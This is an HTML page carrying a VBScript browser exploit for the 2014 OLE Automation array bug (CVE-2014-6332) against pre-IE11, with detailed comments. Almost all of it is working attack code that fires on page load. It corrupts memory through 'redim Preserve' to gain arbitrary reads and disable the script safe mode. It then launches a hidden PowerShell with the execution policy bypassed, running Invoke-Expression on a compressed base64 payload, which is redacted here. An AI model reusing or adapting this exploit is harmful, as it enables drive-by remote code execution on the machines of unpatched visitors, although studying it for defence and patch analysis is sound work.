<!doctype html>
|
|
<html>
|
|
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
|
|
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|
|
<body>
|
|
|
|
<pre>
|
|
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11            |
|        (the VBScript "redim Preserve" array bug generally tracked as      |
|        MS14-064 / CVE-2014-6332, patched November 2014)                  |
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/     |
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec)         |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual   |
| Usage: http://www.fuzzysecurity.com/exploits/21.html                     |
| Note: the base64 payload string has been redacted in this copy, so the   |
|       page is not runnable as-is; the code only targets 32-bit IE with   |
|       "MSIE" in the User-Agent (see Begin()).                            |
|--------------------------------------------------------------------------|
Very nice black-magic yuange, don't think it went unnoticed that you
have been popping shells since 2009 :D 人无千日好,花无百日红
|--------------------------------------------------------------------------|
|
|
</pre>
|
|
|
|
<SCRIPT LANGUAGE="VBScript">
|
|
' Second stage: launches the PowerShell shellcode runner. Nothing here touches the
' memory-corruption primitives; it is a plain ShellExecute of powershell.exe.
' Shell.Application is not creatable from a web page in the engine's safe mode, so
' this is only expected to work because Begin() calls setnotsafemode() first.
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")

'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
' Veil-generated stage: base64(deflate(PowerShell source)). The blob was stripped
' from this copy (placeholder below), so the file cannot run as-is.
payload="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"

' Inflates the blob in memory and hands the result to Invoke-Expression (nothing is
' written to disk). The """"" / chr(34) stacking produces the quotes PowerShell needs
' around the base64 string inside a VBScript string literal.
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

' -NoP: no profile, -NonI: non-interactive, -Exec Bypass: ignore the execution policy.
params="-NoP -NonI -Exec Bypass -Command " & command

'Original POC yuange
'set shell=createobject("Shell.Application")
'shell.ShellExecute "notepad.exe"

'With UAC
' The "runas" verb requests elevation, which shows a UAC prompt to the user.
'shell.ShellExecute "powershell", params, "", "runas", 0

'Without UAC
' Empty verb = default action at the current integrity level; last argument 0 = hidden window.
shell.ShellExecute "powershell", params, "", "", 0
end function
|
|
</script>
|
|
|
|
<SCRIPT LANGUAGE="VBScript">
|
|
|
|
' Shared state for the exploit. aa() and ab() are the two VARIANT arrays whose
' buffers are made to overlap; a0..a3 are the (randomised) indices used for that
' overlap; myarray holds the fake SAFEARRAY header. Declaration order is kept as
' in the original since the technique depends on heap layout.
dim aa()
dim ab()
dim a0          ' current logical upper bound of aa()/ab()
dim a1          ' = a0+2: index into aa() that overlaps ab(0) (see Over())
dim a2          ' = a0+&h8000000: oversized bound that triggers the bug
dim a3          ' random growth step applied per Over() attempt
dim win9x       ' set to 1 by Over() for the second alignment; never read in this file
dim intVersion  ' IE major version parsed from the User-Agent in Begin()
dim rnda        ' unused in this file
dim funclass    ' unused in this file
dim myarray     ' fake SAFEARRAY header bytes, built in Begin()

' Runs on page load.
Begin()
|
|
|
|
' Entry point. Bails out on 64-bit IE and on browsers without "MSIE" in the UA,
' establishes the aa()/ab() overlap via Create(), builds the fake SAFEARRAY header,
' and then either calls runshellcode() (IE < 4; not defined in this file) or
' setnotsafemode() for everything else.
function Begin()
On Error Resume Next
info=Navigator.UserAgent

' The corruption below assumes a 32-bit process; skip 64-bit IE.
if(instr(info,"Win64")>0) then
exit function
end if

' Takes the two characters after "MSIE " (e.g. "10" or "8."). IE11 no longer
' carries the "MSIE" token, which is what enforces "Pre IE11" here. Under
' On Error Resume Next a failed CInt leaves intVersion Empty.
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function

end if

win9x=0

BeginInit()
' Create() retries Over() until the two arrays are adjacent in the expected way.
If Create()=True Then
' Fake SAFEARRAY header that mydata() later aliases as a VT_ARRAY|VT_I1 array:
'   cDims=1, fFeatures=&h880, cbElements=1, cLocks=0, pvData=0,
'   rgsabound[0].cElements=&h7FFF0000, lLbound=0
' i.e. one byte per element starting at address 0, so element index == address.
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
' NOTE(review): runshellcode() is not defined anywhere in this file; on this
' branch the call fails silently because of On Error Resume Next.
runshellcode()
else
setnotsafemode()
end if
end if
end function
|
|
|
|
' Seeds the RNG and picks randomised starting sizes so the heap layout varies
' between attempts: a0 in [13, 30) and a3 in [7, 10) (fractional values; they are
' only ever used as array bounds and in arithmetic with a0).
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
|
|
|
|
' Repeats Over() up to 401 times until it reports that aa() and ab() overlap.
' Returns True on success, False if every attempt failed.
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
|
|
|
|
' Empty procedure; it exists only to be referenced from mydata() (i=testaa).
sub testaa()
end sub
|
|
|
|
' Returns a 32-bit value leaked out of aa(a1) by retyping that element to VT_I4,
' and plants the fake SAFEARRAY header (myarray) in aa(a1+2), retyped to
' VT_ARRAY|VT_I1. Relies on aa(a1+k) sharing memory with ab(k), which Over()
' established: the bit pattern of a double stored in ab(k) lands on aa(a1+k)'s
' VARIANT header.
function mydata()
On Error Resume Next
' Reference the procedure, then Null; this appears to leave a pointer in the
' VARIANT that is read back below as an integer -- TODO confirm which object.
i=testaa
i=null
' Re-open the out-of-bounds view (a2 is the oversized bound).
redim Preserve aa(a2)

ab(0)=0
aa(a1)=i
' 6.36598737437801E-314 has the IEEE-754 bit pattern 0x0000000300000000; the
' non-zero dword (3 = VT_I4) is what ends up in aa(a1)'s vt field, so the element
' is now read as a plain integer.
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
' 1.74088534731324E-310 == 0x0000200C00000000; &h200C = VT_ARRAY|VT_I1, so the
' BSTR in aa(a1+2) becomes a byte array whose header is myarray's character data.
ab(2)=1.74088534731324E-310
mydata=aa(a1)
' Shrink back so ordinary array operations stay in bounds.
redim Preserve aa(a0)
end function
|
|
|
|
|
|
' Uses the read primitive to walk from the pointer leaked by mydata() to what is
' presumably the script engine's per-site state, scans a window of dwords for the
' safety-option value 14 (&hE) and overwrites it with zero, after which
' CreateObject("Shell.Application") in runmumaa() is no longer refused.
' All offsets (+8, +16, &h120..&h180) are engine-version specific.
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
' This read is never used; kept as in the original.
j=readmemo(i+&h134)
' Probe dwords at i+&h120 .. i+&h180 for the flag value 14.
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
' Write through the fake byte array (element index == address). ab(4) is never
' assigned (Empty), so this stores a zero byte. NOTE(review): the write address
' is 4 bytes below the probed one (&h11c vs &h120); carried over unchanged.
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)

j=0
' Re-read after the write; the value is not checked.
j=readmemo(i+&h120+k)

Exit for
end if

next
' 1.69759663316747E-313 == 0x0000000800000000 -> sets aa(a1+2).vt back to
' VT_BSTR (8), presumably so engine teardown frees myarray as a string instead
' of trying to destroy the fake SAFEARRAY.
ab(2)=1.69759663316747E-313
runmumaa()
end function
|
|
|
|
' One attempt at building the overlap primitive. Grows aa()/ab() by the random
' step a3, issues the oversized "redim Preserve aa(a2)" (a2 = a0 + &h8000000), and
' then checks whether the double stored in ab(0) is visible through aa(a1)'s
' VARTYPE. Returns True when the two arrays are adjacent in the expected way.
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

' The oversized resize is the bug: the reallocation fails but aa() keeps the
' enlarged bounds, so indices past a0 reach whatever follows aa()'s buffer.
redim Preserve aa(a2)

type1=1
' IEEE-754 bit pattern 0x3FF1F9ADD3746F66 (low dword 0xD3746F66, high 0x3FF1F9AD).
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
' mem looks like a byte offset of a0+1 VARIANTs (16 bytes each) -- TODO confirm
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function

end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if

' Both magic values are words of the double above with VT_BYREF (&h4000) masked
' off: &h6F66 -> &h2F66 (low word of the low dword) and &hF9AD -> &hB9AD (low word
' of the high dword). Either means ab(0)'s payload bytes sit on aa(a1)'s vt field,
' at one of two alignments; the second one is tagged win9x (not read elsewhere).
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

' Shrink back regardless of outcome.
redim Preserve aa(a0)

end function
|
|
|
|
' Arbitrary 32-bit read: returns the dword at address add. Stores add+4 in aa(a1),
' retypes that element to VT_BSTR through the ab(0) overlap, and uses LenB -- which
' reads a BSTR's 4-byte byte-length prefix at pointer-4 -- to fetch *(add).
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
' 1.69759663316747E-313 == 0x0000000800000000 -> vt = 8 (VT_BSTR)
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

' Clear the fake BSTR type again, presumably so the shrink below does not try to
' free the bogus string pointer.
ab(0)=0

redim Preserve aa(a0)
end function
|
|
|
|
</script>
|
|
|
|
</body>
|
|
</html> |